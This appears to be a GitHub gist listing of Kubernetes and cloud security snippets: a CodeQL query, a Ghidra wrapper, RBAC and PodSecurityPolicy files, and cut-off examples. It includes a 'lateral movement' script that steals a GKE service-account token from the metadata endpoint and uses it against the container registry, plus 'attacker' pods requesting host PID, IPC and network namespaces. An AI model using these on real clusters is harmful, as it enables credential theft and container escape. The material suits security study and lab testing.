mkdir -p ~/.minikube/files/etc
echo 127.0.0.1 dex.example.com > ~/.minikube/files/etc/hosts
minikube start --kubernetes-version=1.30 \
--extra-config=apiserver.oidc-issuer-url=https://dex.example.com:32000 \
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/ptrace.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| #include <assert.h> | |
| #include <signal.h> | |
| void hello() { | |
| printf("Hello debugger\n"); |
abhisek
/ gke-pod-hacks.sh
Last active
May 12, 2020 23:55
Lateral movement in GKE Pod using Cloud metadata endpoint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get temporary access token using Google Cloud instance metadata | |
| export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \ | |
| jq -r '.access_token') | |
| # List all repo from Google cloud registry using access token | |
| curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog | |
| # Docker login | |
| echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io |
abhisek
/ go-int-down-casting.ql
Created
May 2, 2020 05:37
CodeQL query to find integer casting issues
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import go | |
| import semmle.go.dataflow.DataFlow | |
| import semmle.go.dataflow.TaintTracking | |
| class IntegerSource extends Function { | |
| IntegerSource() { | |
| this.hasQualifiedName("strconv", "Atoi") or | |
| this.hasQualifiedName("strconv", "ParseInt") | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ghidra () { | |
| del_stopped ghidra | |
| xhost +local:root | |
| docker run --init -it --rm --name ghidra --cpus 2 --memory 4g -e MAXMEM=4G -v /etc/localtime:/etc/localtime:ro -v /tmp/.X11-unix:/tmp/.X11-unix -v "${HOME}/.gtkrc:/root/.gtkrc" -e "DISPLAY=unix${DISPLAY}" -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra -v /home/user1/Work/ghidra:/root/storage blacktop/ghidra | |
| xhost -local:root | |
| } | |
| ghidra |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: policy/v1beta1 | |
| kind: PodSecurityPolicy | |
| metadata: | |
| name: developers-psp | |
| spec: | |
| privileged: false | |
| allowPrivilegeEscalation: false | |
| hostNetwork: false | |
| hostPID: false | |
| hostIPC: false |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Pod | |
| metadata: | |
| labels: | |
| run: attacker-pod | |
| name: attacker-pod | |
| spec: | |
| hostPID: true | |
| hostIPC: true | |
| hostNetwork: true |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g') | |
| export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}') | |
| export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d) | |
| export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}") | |
| cat <<EOF | |
| apiVersion: v1 | |
| kind: Config |
abhisek
/ k8s-sa-pod-crud.yml
Created
March 17, 2020 04:08
Kubernetes Service Account with Pod CRUD Privilege to Single Namespace
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Namespace | |
| metadata: | |
| name: developers | |
| --- | |
| apiVersion: v1 | |
| kind: ServiceAccount | |
| metadata: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Pod | |
| metadata: | |
| labels: | |
| run: ubuntu-1 | |
| name: ubuntu-1 | |
| spec: | |
| hostPID: true | |
| hostIPC: true | |
| hostNetwork: true |
NewerOlder